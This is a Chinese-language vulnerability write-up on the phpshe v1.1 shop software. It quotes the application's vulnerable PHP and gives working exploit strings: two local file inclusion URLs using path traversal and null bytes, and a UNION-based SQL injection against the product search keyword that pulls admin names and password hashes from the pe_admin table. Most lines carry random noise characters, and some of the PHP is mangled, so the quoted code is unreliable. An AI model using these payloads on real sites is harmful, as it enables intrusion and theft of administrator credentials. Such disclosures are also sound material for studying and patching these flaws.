phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
* O5 ?) {  S  t8 c; C/* E-Mail : 681796@qq.com
4 I+ z2 \& o8 b  o' w/*******************************************************/
/ N) R- _  M8 s' G( X/ ~5 ]6 N0×00 整体大概参数传输


0 ~7 h1 b7 b$ W7 \+ l$ y( {
//common.php
* b% _. f/ m' q5 Y* Z8 `if (get_magic_quotes_gpc()) {
  C& x- h$ s7 o) n' ]- ~- J3 H!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
1 M# L- P3 H2 w, J& [( e!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
4 j! x0 _/ e8 t9 a) M6 U7 h1 _' f}
else {
" K- {+ B. ?% i: A!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
% [/ h2 ~* N& @9 Q, J& }. D!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

8 e# k8 O/ T0 r2 P/ ]7 W0×01 包含漏洞

! J# h0 c" D9 ?
. q- q6 J: v" A& ]/ G  r  n2 ]//首页文件
- q$ F7 |6 `& [9 X' f% L<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
3 A  h2 E4 g4 m6 E0 S8 j( E6 E6 tinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
2 h  b+ s" [1 l! Vpe_result();
1 i3 \4 K2 M* v1 F?>
) f6 i+ b+ K9 L0 Z9 t! [//common 文件 第15行开始
url路由配置
, c& r# f* |5 i7 b$module = $mod = $act = 'index';
' V# E2 d8 ^$ o; \  p" _$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

. E- G6 [  X5 K& | 0×02 搜索注入

<code id="code2">

//product.php文件
$ S: p; b6 Y/ G7 ~4 v! Bcase 'list':
; e8 C% p& a4 Q$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
) G9 e% Z* e3 ]8 {, i' o//搜索
: M5 |3 N/ }& e" `$sqlwhere = " and `product_state` = 1";
' u: `4 R; J. n4 ?2 {* Gpe_lead('hook/category.hook.php');
if ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
6 m! N( U5 J' @% E5 b}
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
. [# _$ ]* L- n( g) ?if ($_g_orderby) {
$orderby = explode('_', $_g_orderby);
6 ~4 @& N: f/ z" B- w$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
1 _6 ^. [3 }# n}
; O( g% H. B, N2 k1 j$ `* Celse {
. i' Y; h3 e  f7 x  K5 s$sqlwhere .= " order by `product_id` desc";
/ n' f. G) E4 ~* W' q- l7 n. E}
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
$product_hotlist = product_hotlist();
//当前路径
( e7 z2 @* b/ \& @/ P% c, q+ h9 |9 [0 T$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
/ U+ \, r; o( O3 l! C6 L//跟进selectall函数库
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
- x+ c% }5 T# m. U  y, j. C{
$ y  c) c( x% P, M& o7 Z//处理条件语句
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
+ K1 t) s# G9 ^9 l. q: i8 C  Iproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
2 u# _1 X8 X( T4 \+ ?

</code>
2 B. D' I# z5 E5 z6 ^9 M" C9 Y, Z
0×03 包含漏洞2
/ ~6 B/ L4 W( k  Y+ m4 ^
% i1 k5 H# J% {9 {* q<code id="code3">

//order.php

case 'pay':

- f1 Z/ s5 K$ N- y$ _$order_id = pe_dbhold($_g_id);

. e+ e* O/ D, z' L  U( P3 S: K$cache_payway = cache::get('payway');

* Z# S( Y8 A9 ]% [  Zforeach($cache_payway as $k => $v) {

2 T  B7 Y8 O! O& [2 Q$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

  J6 n8 I. b- v! P/ }* H  a- W. Oif ($k == 'bank') {

* s5 y2 ]1 C- M  p) u& ]4 o$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

' d/ P& v4 N. W$ G, \: X) a5 P}

}

1 j  F& ?$ x* F: [/ P" L. }  d1 n$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

!$order['order_id'] && pe_error('订单号错误...');

6 D9 G* k7 V, O! n/ A- z5 {& Pif (isset($_p_pesubmit)) {

if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {

2 v6 V2 j. J5 w: j& Y$order['order_name'] .= "{$v['product_name']};";

, p. j! N7 L3 X" E9 C& o8 c}

echo '正在为您连接支付网站，请稍后...';

1 B* g  Y5 Y9 F4 l, Xinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

" v4 `4 E; N' g1 c* J3 k7 ~# s' ~}//当一切准备好的时候就可以进行"鸡肋包含了"

else {

pe_error('支付错误...');

}

}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

break;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>